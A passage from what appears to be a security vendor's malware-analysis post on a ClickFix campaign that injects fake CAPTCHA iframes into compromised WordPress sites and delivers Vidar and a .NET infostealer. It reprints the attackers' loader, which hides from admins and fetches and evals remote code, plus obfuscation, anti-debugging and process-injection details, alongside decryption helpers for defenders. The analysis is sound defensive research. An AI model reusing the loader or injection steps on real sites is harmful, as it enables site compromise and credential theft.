}</pre><p><span style='font-size: undefined;'><em>Figure 5: A malicious loader script included in the </em></span><span style='font-size: undefined;'><span data-type='inlineCode'><em>medsnsw[.]com</em></span></span><span style='font-size: undefined;'><em> website HTML</em></span></p><p><span style='font-size: undefined;'>Masquerading as a performance optimization script, the actual purpose of the code above was to find and inject the first live script from a hardcoded set of remote locations, encoded in Base64. This would only be done when the string </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>wordpress_logged_in_</span></span><span style='font-size: undefined;'> was not found in the website’s (non-HTTP-only) cookies, hinting at an intent to hide this snippet from site administrators and editors.</span></p><pre language="javascript">&gt; perfEndpoints.map(atob)
[
	'hxxps[://]goveanrs[.]org/jsrepo?rnd=',
	'hxxps[://]getalib[.]org/jsrepo?rnd=',
	'hxxps[://]govearali[.]org/jsrepo?rnd=',
	'hxxps[://]ligovera[.]shop/jsrepo?rnd=',
	'hxxps[://]alianzeg[.]shop/jsrepo?rnd=',
	'hxxps[://]ztdaliweb[.]shop/jsrepo?rnd='
]</pre><p><span style='font-size: undefined;'><em>Figure 6: Decoded list of JavaScript source locations</em></span><em><br/></em>⠀</p><p><span style='font-size: undefined;'>Consistent with this, the next request recorded in the scan fetched a script from </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>goveanrs[.]org</span></span><span style='font-size: undefined;'> (</span><a href="https://urlscan.io/responses/8c83b46a7ca674bf717765b734a919c78556c193d1942de94be409c4ed663d1a/" target="_blank"><span style='font-size: undefined;'>urlscan response</span></a><span style='font-size: undefined;'>), which we analysed to understand how the ClickFix content was injected into the website and how we could potentially identify more compromised websites.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Continuing the hunt, we’ve also identified an alternative way of loading the ClickFix JavaScript: In these cases, the script was hosted directly on the compromised WordPress instance and was retrieved by fetching </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>/wp-admin/admin-ajax.php?action=ajjs_run</span></span><span style='font-size: undefined;'>.</span></p><pre language="javascript">(function(){
	if (window.__AJJS_LOADED__) return;
    window.__AJJS_LOADED__ = false;

	function runAJJS() {
		if (window.__AJJS_LOADED__) return;
        window.__AJJS_LOADED__ = true;

		const cookies = document.cookie;
		const userAgent = navigator.userAgent;
		const referrer = document.referrer;
		const currentUrl = window.location.href;

		if (/wordpress_logged_in_|wp-settings-|wp-saving-|wp-postpass_/.test(cookies)) return;

		if (/iframeShown=true/.test(cookies)) return;

		if (/bot|crawl|slurp|spider|baidu|ahrefs|mj12bot|semrush|facebookexternalhit|facebot|ia_archiver|yandex|phantomjs|curl|wget|python|java/i.test(userAgent)) return;

		if (referrer.indexOf('/wp-json') !== -1 ||
            referrer.indexOf('/wp-admin') !== -1 ||
            referrer.indexOf('wp-sitemap') !== -1 ||
            referrer.indexOf('robots') !== -1 ||
            referrer.indexOf('.xml') !== -1) return;

		if (/wp-login\.php|wp-cron\.php|xmlrpc\.php|wp-admin|wp-includes|wp-content|\?feed=|\/feed|wp-json|\?wc-ajax|\.css|\.js|\.ico|\.png|\.gif|\.bmp|\.jpe?g|\.tiff|\.mp[34g]|\.wmv|\.zip|\.rar|\.exe|\.pdf|\.txt|sitemap.*\.xml|robots\.txt/i.test(currentUrl)) return;

        fetch('hxxps[://]dakarailarriett[.]com/wp-admin/admin-ajax.php?action=ajjs_run')
        .then(resp =&gt; resp.text())
        .then(jsCode =&gt; {
			try { eval(jsCode); } catch(e) { console.error('Cache optimize error', e); }
        });
    }

	if (document.readyState === 'loading') {
        document.addEventListener('DOMContentLoaded', runAJJS);
    } else {
        runAJJS();
    }
})();</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 7: Alternative way of loading ClickFix script observed on </em></span><span style='font-size: undefined;'><span data-type='inlineCode'><em>dakarailarriett[.]com</em></span></span></p><p><span style='font-size: undefined;'>This variant is interesting in that it attempts to more robustly evade administrative scrutiny by explicitly checking the document referrer, the window location (URL), as well as multiple WordPress-related cookies, checking signs not only of administrative access, but also automatic crawlers or other artifacts indicating the website is being loaded by an undesirable victim. In these cases, no AJAX request to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>admin-ajax.php</span></span><span style='font-size: undefined;'> is issued.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Lastly, we have seen several cases where the ClickFix injector script was directly pasted into the website source.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>ClickFix loader JavaScript analysis</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The obfuscated JavaScript returned by the AJAX endpoint or the dedicated host server aims to make analysis difficult by outlining and encrypting strings and constants, utilizing niche JavaScript mechanics, synthesizing opaque predicates and dead code, and employing clever tricks to detect and thwart analysis.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>After an initial auto-deobfuscation pass using the tool available at </span><a href="https://obf-io.deobfuscate.io/" target="_blank"><span style='font-size: undefined;'>https://obf-io.deobfuscate.io/</span></a><span style='font-size: undefined;'>, the high-level control flow of the script can be identified rather easily. It’s apparent that the file was transformed using a commonly used obfuscator, which creates a global encrypted string array that is first rotated and shuffled and then accessed from across the script to access and decode strings just in time. During the initial transformation, a sneaky anti-analysis check is performed that enters an infinite loop in case the script is not running in its original form. In our sample (see the IoCs section), </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>_0x4927</span></span><span style='font-size: undefined;'> is the function that returns this global string array and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>_0x288c</span></span><span style='font-size: undefined;'> is the function decoding the strings and containing the anti-analysis check.</span></p><pre language="javascript">// Closure that holds the global encrypted string array.
function _0x4927() {
	const _0x1099ec = ['eGC3W5rW', 'owxcKc/cSW', 'DCkLvKxdUq', 'gCoHWQpcL3m', 'W67cQIXUW44', 'W6evAmo4W6a', /* ... */];
  _0x4927 = function () {
		return _0x1099ec;
  	};
	return _0x4927();
}

// Initial loop which shuffles the array until a condition is met.
(function (_0x44d6db, _0x238a8b) {
	const _0x43fe80 = _0x44d6db();
	while (true) {
		try {
			const _0x18408f = parseInt(_0x288c(1632, ')c9q')) / 1
				+ parseInt(_0x288c(1700, 'bx%O')) / 2
				+ -parseInt(_0x288c(700, '&Blv')) / 3
				+ -parseInt(_0x288c(553, 'VOv0')) / 4
				+ parseInt(_0x288c(638, 'bi$%')) / 5 * (parseInt(_0x288c(1126, 'KcZ$')) / 6)
        		+ parseInt(_0x288c(762, 'KgMi')) / 7 * (-parseInt(_0x288c(1696, '9d$R')) / 8)
        		+ parseInt(_0x288c(559, 'd3q[')) / 9 * (parseInt(_0x288c(1050, '&Blv')) / 10);
			if (_0x18408f === _0x238a8b) {
				break;
      		} else {
        	_0x43fe80.push(_0x43fe80.shift());
      		}
    	} catch (_0x537399) {
     	 _0x43fe80.push(_0x43fe80.shift());
    	}
 	 }
})(_0x4927, 463699);</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 8: Code listing illustrating the global string array idiom</em></span></p><p><span style='font-size: undefined;'>The anti-analysis check makes use of a clever assumption: While the script is deployed obfuscated and minified, analysts will presumably first transform it into a more readable representation before evaluating chunks of it. The anti-analysis check consists of testing the string representation of a previously defined dummy function against a regex. In JavaScript, the string representation of a non-native function (i.e. the string returned by the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>toString</span></span><span style='font-size: undefined;'> method called on the function object) is the </span><span style='font-size: undefined;'><em>verbatim definition</em></span><span style='font-size: undefined;'> of the function, including any whitespace, comments, etc. In this case, the code specifically checks if the function was defined with any whitespace after the opening curly brace — in effect, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>function(){return ‘newState’;}</span></span><span style='font-size: undefined;'> will pass the check, but </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>function() { return ‘newState’; }</span></span><span style='font-size: undefined;'> will not.</span></p><pre language="javascript">function _0x288c(index, _4_chars) {
	/* ... (Actual decoding logic, not important.) */

    // The KLCBjr attribute of _0x288c is set when the anti-analysis
    // check has been passed -&gt; the 'if' body is executed only the first time.
	if (_0x288c.KLCBjr === undefined) {
		const AntiDebug = function (ref_to_0x288c_function) {
			this.ref_to_0x288c_function = ref_to_0x288c_function;
			this.yyIdzW = [1, 0, 0];
			this.regexTestedFunction = function () {
				return 'newState';
            };
        };
        AntiDebug.prototype.testFunctionRepr = function () {
			const regex = new RegExp("\\w+ *\\(\\) *{\\w+ *['|\"].+['|\"];? *}");
			const test_result = regex.test(this.regexTestedFunction.toString()) ? --this.yyIdzW[1] : --this.yyIdzW[0];
			return this.enterInfiniteLoopIfFalse(test_result);
        };
        AntiDebug.prototype.enterInfiniteLoopIfFalse = function (zero_or_one) {
			if (!Boolean(~zero_or_one)) {
				return zero_or_one;
            }
			return this.infiniteLoop(this.ref_to_0x288c_function);
        };
		// This function infinitely appends elements to this.yyIdzW.
		AntiDebug.prototype.infiniteLoop = function (ref_to_0x288c_function) {
			let i = 0;
			for (let length = this.yyIdzW.length; i &lt; length; i++) {
				this.yyIdzW.push(Math.round(Math.random()));
				length = this.yyIdzW.length;
            }
			return ref_to_0x288c_function(this.yyIdzW[0]);
        };
		// Anti-analysis check is invoked -&gt; loops infinitely if the check fails.
		new AntiDebug(_0x288c).testFunctionRepr();
		// Attribute of function is written to skip the check from now on.
		_0x288c.KLCBjr = true;
    }

	/* ... */
}</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 9: Annotated string decoding function containing an anti-analysis check</em></span></p><p><span style='font-size: undefined;'>Luckily, this check can be bypassed even without de-obfuscating the function, simply by setting the “check passed” flag (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>_0x288c.KLCBjr = true</span></span><span style='font-size: undefined;'>) immediately after the function is defined.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Apart from the initial check, there is also a periodical trap to debugger triggered every 4 seconds to thwart DevTools-based debugging, and the last anti-debugging measure the obfuscator includes is a replacement of all console logging methods with no-op functions, so that trying to debug-print expressions will do nothing (despite the string representation of the methods looking normal).</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Stripping all this anti-analysis code away, we’re left with the actual logic. All of the remaining obfuscation relies on decrypting strings using the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>_0x288c</span></span><span style='font-size: undefined;'> function from before, and outlining constants and functions into an (immutable) dictionary object.</span></p><pre language="javascript">// Example of an immutable dictionary with outlined constants and functions.
const _0x1f62bb = {
	'SEDWD': _0x288c(494, 'jRBP'),
	'xPXNi': _0x288c(997, 'VJ)K'),
	'fxaUb': _0x288c(1722, 'AFao'),
	'NMdCB': _0x288c(1026, 'c[l*'),
	'MwFFz': _0x288c(1055, '0YkN') + _0x288c(657, '8k1N') + _0x288c(1037, 'DoFz') + ')',
	/* ... */
	'LtnFV': function (_0x4711dd, _0x395488, _0x450231) {
		return _0x4711dd(_0x395488, _0x450231);
    },
	/* ... */
	'RqVmA': function (_0x34f24d, _0xf681c2) {
		return _0x34f24d !== _0xf681c2;
    },
	'jkPPL': _0x288c(1004, '9Ea9')
};

// Example of an opaque predicate using the outlined code.
// The predicate is unconditionally false, so the true branch of the 'if' is never executed.
// The unreachable branch references undeclared variables, possibly to break analysis tools.
if (_0x1f62bb[_0x288c(606, '@0X6')](_0x1f62bb[_0x288c(1088, '9Ea9')], _0x1f62bb[_0x288c(686, 'AFao')])) {
	if (_0x4eb07e) {
		const _0x1ecc29 = _0x158fa0[_0x288c(1689, 'udfh')](_0x585a9a, arguments);
        _0x45d6ea = null;
		return _0x1ecc29;
    }
}</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 10: Code listing illustrating some of the JavaScript code obfuscations</em></span></p><p><span style='font-size: undefined;'>When these obfuscations are removed (inlined and evaluated), the script logic turns out to be rather simple. A target URL for the ClickFix iframe is defined and the browser local storage (specific to the host website) is queried for the key </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>iframeShown</span></span><span style='font-size: undefined;'>. This key is set once the malicious iframe has been displayed 3 times, after which it is not displayed anymore. Once the DOM of the host website is fully loaded, the iframe is constructed, its source is set to the target url with a query parameter </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>ref</span></span><span style='font-size: undefined;'> set to the hostname of the infected website, and it is appended to the document body (positioned on top of everything else).</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>A deobfuscated snippet of the raw ClickFix injector script logic can be </span><a href="https://github.com/rapid7/Rapid7-Labs/blob/main/Misc/ClickFix_DoubleDonut_Deobfuscated_Injector.js.txt" target="_blank"><span style='font-size: undefined;'>found</span></a><span style='font-size: undefined;'> on Rapid7 Labs’ public GitHub.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Note that the threat actor clearly intended only to show the iframe once every 30 days at most by setting and checking a cookie for the host website, as well as to dismiss the iframe after 5 seconds of clicking the button inside the iframe. But as became apparent when analyzing the JavaScript running in the ClickFix iframe, they in fact never post the “</span><span style='font-size: undefined;'><span data-type='inlineCode'>buttonClicked</span></span><span style='font-size: undefined;'>” message to the host website.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>This makes the compromise much more obvious, since the website has to be loaded a total of 4 times before it becomes usable again, instead of dismissing the ClickFix automatically with 5 seconds of a click and only displaying it once every 30 days. This, in our opinion, explains why so many of the compromised websites might have been sanitized so quickly. The question remains whether they </span><span style='font-size: undefined;'><em>truly</em></span><span style='font-size: undefined;'> have been sanitized, and whether the root cause of the compromise — which remains unconfirmed — was also properly addressed.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>In any case, using information obtained from these de-obfuscated snippets, we have been able to hunt for and find many more compromised websites, JavaScript hosting domains and fake CAPTCHA implant hosting domains, which are all included in the IoCs section.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>ClickFix payload JavaScript analysis</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>The JavaScript embedded in the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>captcha.html</span></span><span style='font-size: undefined;'> files loaded by the injected iframes is obfuscated in the exact same way described before, only this time it is split into one script in the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>&lt;head&gt;</span></span><span style='font-size: undefined;'> element and one script in the document </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>&lt;body&gt;</span></span><span style='font-size: undefined;'>. The de-obfuscated snippets, </span><a href="https://github.com/rapid7/Rapid7-Labs/blob/main/Misc/ClickFix_DoubleDonut_Deobfuscated_Payload.js.txt" target="_blank"><span style='font-size: undefined;'>available</span></a><span style='font-size: undefined;'> in our public GitHub repository, probably need little explanation — the former simply sets up the click event handler to copy the malicious command to the clipboard, and the latter populates the HTML with a chosen translation of the ClickFix instructions, which is chosen based on the declared locale of the host website.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The CAPTCHA instructions are available in (at least) 31 languages: English, French, German, Spanish, Italian, Portuguese, Dutch, Russian, Ukrainian, Polish, Turkish, Romanian, Hungarian, Czech, Swedish, Finnish, Danish, Norwegian, Greek, Bulgarian, Serbian, Croatian, Hebrew, Arabic, Indonesian, Malay, Thai, Vietnamese, Estonian, Latvian, and Lithuanian.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Double Donut: Two-stage shellcode loader analysis</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Besides the identical ClickFix injector scripts and the shared infrastructure hosting them, another characteristic tying all these compromises together into a single campaign is the singular IP address hosting the final malware payloads (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>94.154.35[.]115</span></span><span style='font-size: undefined;'>, moved to </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>172.94.9[.]187</span></span><span style='font-size: undefined;'> at the beginning of March). While the initial PowerShell stager C2s vary (see IoCs), eventually they always lead to the same shellcode loader hosted at this server. It should be noted that nearly all of the hosts observed in the attack belong to Autonomous System (AS) number 202412.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>As it turns out, the position independent loader used by the threat actor is the open-source </span><a href="https://github.com/TheWover/donut" target="_blank"><span style='font-size: undefined;'>Donut loader (GitHub)</span></a><span style='font-size: undefined;'>, which has been commonly seen already in past ClickFix campaigns. Luckily, the open-source Donut loader is met with an open-source </span><a href="https://github.com/volexity/donut-decryptor" target="_blank"><span style='font-size: undefined;'>Donut decryptor (GitHub)</span></a><span style='font-size: undefined;'>, which we can use to automatically decrypt and extract the payload and metadata.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>A defining feature of this campaign is that the Donut loader is used twice in sequence. The first Donut shellcode (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>cptch.bin</span></span><span style='font-size: undefined;'>) loads only a small executable that tries to acquire </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>SeDebugPrivilege</span></span><span style='font-size: undefined;'> and then downloads the second Donut shellcode (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>cptchbuild.bin</span></span><span style='font-size: undefined;'>) from the same remote server, which it then injects into a service host process (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>svchost.exe</span></span><span style='font-size: undefined;'>) matching the native architecture (non-WOW64 process on x64, no effect on x86). We will call this downloader binary the “DoubleDonut Loader” for brevity. The second shellcode in turn contains the final infostealer payload executable. For convenience, we are referring to this whole component of the attack (1st shellcode -&gt; downloader -&gt; 2nd shellcode) as “DoubleDonut”.</span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd17d532637378e67/69af1c564e5c7e00088acb9b/04-doubledonut-loader.png" alt="04-doubledonut-loader.png" caption="Figure 11: The simplistic design of the DoubleDonut Loader" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="04-doubledonut-loader.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltd17d532637378e67/69af1c564e5c7e00088acb9b/04-doubledonut-loader.png" data-sys-asset-uid="bltd17d532637378e67" data-sys-asset-filename="04-doubledonut-loader.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 11: The simplistic design of the DoubleDonut Loader" data-sys-asset-alt="04-doubledonut-loader.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 11: The simplistic design of the DoubleDonut Loader</figcaption></div></figure><p>⠀</p><p><span style='font-size: undefined;'>The downloaded shellcode is injected and executed using a standard sequence of </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_READ | PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD)</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>VirtualAllocEx</span></span><span style='font-size: undefined;'>, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>WriteProcessMemory</span></span><span style='font-size: undefined;'> and </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>CreateRemoteThread</span></span><span style='font-size: undefined;'>.</span></p><h3 style="direction: ltr;"><span style='color:rgb(67, 67, 67);'>Updates to Vidar Stealer v2</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>As mentioned previously, one of the payloads we saw DoubleDonut deliver in late January was the notorious Vidar stealer. One evolution of this infostealer malware that we have not seen publicly documented before is a shift towards encrypted C2 configurations and string obfuscation. The sample we’ve analysed (see the IoCs section for a hash) also employs a different control flow graph obfuscation than the previously reported CFG flattening technique.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Apart from each string in Vidar samples being XORed with a random single-byte constant (unique per string; usage of </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>0x00</span></span><span style='font-size: undefined;'> results in the string being unchanged), a custom encryption algorithm is now used specifically to hide C2 configurations. The C2 configuration is an array of up to 7 records, where every record contains 3 strings: the C2 URL itself, an identifier/anchor used for parsing dead drop resolver responses, and an optional User-Agent string.</span></p><pre language="cpp">struct VidarV2ConfigEntry
{
	char url        [0x100];
	char anchor     [0x100];
	char user_agent [0x100];
}

/* .rdata section */
constexpr static const char *g_encrypted_build_version = "...";
constexpr static const char *g_encrypted_build_id = "...";
constexpr static const char *g_decryption_key = "...";
constexpr static struct VidarV2ConfigEntry g_encrypted_config[7] = { /* ... */ };</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 12: A high-level representation of the C2 configuration layout in latest Vidar samples</em></span></p><p><span style='font-size: undefined;'>Based on whether the C2 URL contains the string </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>.me/</span></span><span style='font-size: undefined;'> or </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>amcommunity.com</span></span><span style='font-size: undefined;'>, the URL is either fetched and resolved to the true C2, or used as a C2 directly. The C2 resolution is done by finding the anchor string in the HTML response and extracting the URL following it, delimited by a vertical pipe symbol (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>|</span></span><span style='font-size: undefined;'>). This technique, used notoriously by both Vidar and Lumma stealers, allows the attackers to rotate C2 addresses without invalidating the malware samples already released into the wild.</span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta3d5377991de041c/69af1c56cd033a00088912d0/05-steam-vidar.png" alt="05-steam-vidar.png" caption="Figure 13: A Steam profile being used as a dead drop resolver by Vidar with anchor “ho0r1”" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="05-steam-vidar.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blta3d5377991de041c/69af1c56cd033a00088912d0/05-steam-vidar.png" data-sys-asset-uid="blta3d5377991de041c" data-sys-asset-filename="05-steam-vidar.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 13: A Steam profile being used as a dead drop resolver by Vidar with anchor “ho0r1”" data-sys-asset-alt="05-steam-vidar.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 13: A Steam profile being used as a dead drop resolver by Vidar with anchor “ho0r1”</figcaption></div></figure><p>⠀</p><p><span style='font-size: undefined;'>Unlike other infostealers, which use standard symmetric cipher algorithms to decrypt their configurations (e.g. ChaCha20 used by Lumma or RC4 by StealC), Vidar invents its own Vigenère-like decryption routine, which can be replicated in Python like this:</span></p><pre language="python">def vidar_c2_config_string_decode(
    ciphertext: str,
    key: str,
    alphabet: str = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!#$&()*+,-./:;&lt;=&gt;?@[]^_`{|}~ "
) -&gt; str:
    key_len = len(key)
    alpha_len = len(alphabet)
	assert key_len != 0 and alpha_len != 0 and key_len == alpha_len, "Invalid key or alphabet length"

	max_len = min(len(ciphertext), 512)
    out = []
	for i in range(max_len):
        ch = ciphertext[i]
        key_offset = max(0, key.find(ch))
        decoded_ch = alphabet[(key_offset - i) % key_len]
        out.append(decoded_ch)

return "".join(out)</pre><p style="text-align: center;direction: ltr;"><span style='font-size: undefined;'><em>Figure 14: A reimplementation of Vidar C2 decryption routine in Python</em></span></p><p><span style='font-size: undefined;'>To help researchers and defenders analyze and track this threat, we are publishing a </span><a href="https://github.com/rapid7/Rapid7-Labs/blob/main/Malware%20Config%20Extractors/vidar_v2_extract.py" target="_blank"><span style='font-size: undefined;'>C2 configuration extractor script</span></a><span style='font-size: undefined;'> that can be run on any Vidar payload that uses this decryption procedure.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Apart from the encrypted C2 configuration, another upgrade Vidar introduced is a new mechanism for control-flow obfuscation. Previously, Vidar payloads implemented a simple CFG flattening algorithm, which, albeit effective, is quite common and easy to reverse. The new samples use a related, but different technique, which consists of a combination of:</span></p><ul><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Opaque predicates referencing global variables,</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Infinite loops in dead branches,</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>alloca</span></span><span style='font-size: undefined;'> constructs (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>call; sub rsp, rax</span></span><span style='font-size: undefined;'>) with obfuscated constant arguments (to break decompilers), and</span></p></li><li style="direction: ltr;"><p style="direction: ltr;"><span style='font-size: undefined;'>Jumps from dead branches to previous code blocks, which results in decompilers interpreting these as </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>while(1)</span></span><span style='font-size: undefined;'>-style loops and duplicating a lot of the code in the output.</span>⠀</p></li></ul><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltad90bfe53974b5a7/69af1c5677fad000083ddbf3/06-vidar-cfg-ida.png" height="435" alt="06-vidar-cfg-ida.png" caption="Figure 15: Excerpt from Hex-Rays IDA decompiler output for “main” stealer subroutine" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="06-vidar-cfg-ida.png" width="813" style="width: 813px; height: 435px" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/bltad90bfe53974b5a7/69af1c5677fad000083ddbf3/06-vidar-cfg-ida.png" data-sys-asset-uid="bltad90bfe53974b5a7" data-sys-asset-filename="06-vidar-cfg-ida.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 15: Excerpt from Hex-Rays IDA decompiler output for “main” stealer subroutine" data-sys-asset-alt="06-vidar-cfg-ida.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 15: Excerpt from Hex-Rays IDA decompiler output for “main” stealer subroutine</figcaption></div></figure><h3><span style='color:rgb(67, 67, 67);'>Impure Stealer (.NET)</span></h3><p style="direction: ltr;"><span style='font-size: undefined;'>Another payload we’ve seen DoubleDonut deliver is an unknown, or rather so far unnamed, .NET infostealer. Upon a first glance at its network communications, one may infer similarities with the PureLogs stealer family — namely the use of a custom Type-Length-Value (TLV) data encoding, which constitutes a sort of a custom network protocol on top of TCP — and some vendors actually classify the sample as such. However, a closer examination reveals that this is an otherwise unrelated stealer, using different obfuscator tools, different mechanism for config decryption, and AES-256-CBC with a server-provided key for encryption of C2 communication, whereas PureLogs uses 3DES with a hard-coded key. For these reasons, we’ve decided to call this malware </span><span style='font-size: undefined;'><strong>Impure Stealer</strong></span><span style='font-size: undefined;'>.</span></p><figure style="margin: 0"><div style="display: inline-block"><img src="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7cf8efea9159c700/69af1c56856e0e000832ed8d/07-impure-entry.png" alt="07-impure-entry.png" caption="Figure 16: Stealer entry point method disassembled using dnSpy" class="embedded-asset" content-type-uid="sys_assets" type="asset" asset-alt="07-impure-entry.png" style="width: auto" data-sys-asset-filelink="https://images.contentstack.io/v3/assets/blte4f029e766e6b253/blt7cf8efea9159c700/69af1c56856e0e000832ed8d/07-impure-entry.png" data-sys-asset-uid="blt7cf8efea9159c700" data-sys-asset-filename="07-impure-entry.png" data-sys-asset-contenttype="image/png" data-sys-asset-caption="Figure 16: Stealer entry point method disassembled using dnSpy" data-sys-asset-alt="07-impure-entry.png" data-sys-asset-position="none" sys-style-type="display"/><figcaption style="text-align:center">Figure 16: Stealer entry point method disassembled using dnSpy</figcaption></div></figure><p>⠀</p><p><span style='font-size: undefined;'>Besides the specific naming convention used for type and variable names and the code-flattening and opaque predicate obfuscations, the stealer can be identified by a repeating string decoding/decryption pattern, which is illustrated already by the first statement in the entry point method. There, </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>column0051.offset6910</span></span><span style='font-size: undefined;'> is called with a hexadecimal string and a signed 32-bit integer as arguments — this is in fact the string decryption routine.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>Besides the integer key, the decryption routine depends on one more input, specific per sample, which is a permutation of the 16 hexadecimal digit characters. This alphabet is stored as a static constant (</span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>column0051.source97</span></span><span style='font-size: undefined;'> in our particular sample) and can be found referenced from </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>offset6910</span></span><span style='font-size: undefined;'> indirectly via the </span><span style='color:rgb(24, 128, 56);font-size: undefined;'><span data-type='inlineCode'>column0051.temp67</span></span><span style='font-size: undefined;'> method.</span></p><p style="direction: ltr;"><span style='font-size: undefined;'>The decryption algorithm itself can be rewritten as follows:</span>⠀</p><pre language="python">def impure_stealer_string_decode(
    hex_ciphertext: str,
    key: int,
    alphabet: str
) -&gt; str:
	if len(alphabet) != 16 or len(set(alphabet)) != 16:
		raise ValueError("The alphabet must be 16 unique characters.")
	if (len(hex_ciphertext) & 3) != 0:
		raise ValueError("Input length must be a multiple of 4 characters.")

    lut = {ch: i for i, ch in enumerate(alphabet)}
    out = []
	for i in range(len(hex_ciphertext) // 4):
		try:
            n0 = lut[hex_ciphertext[i * 4 + 0]]
            n1 = lut[hex_ciphertext[i * 4 + 1]]
            n2 = lut[hex_ciphertext[i * 4 + 2]]
            n3 = lut[hex_ciphertext[i * 4 + 3]]
		except KeyError as e:
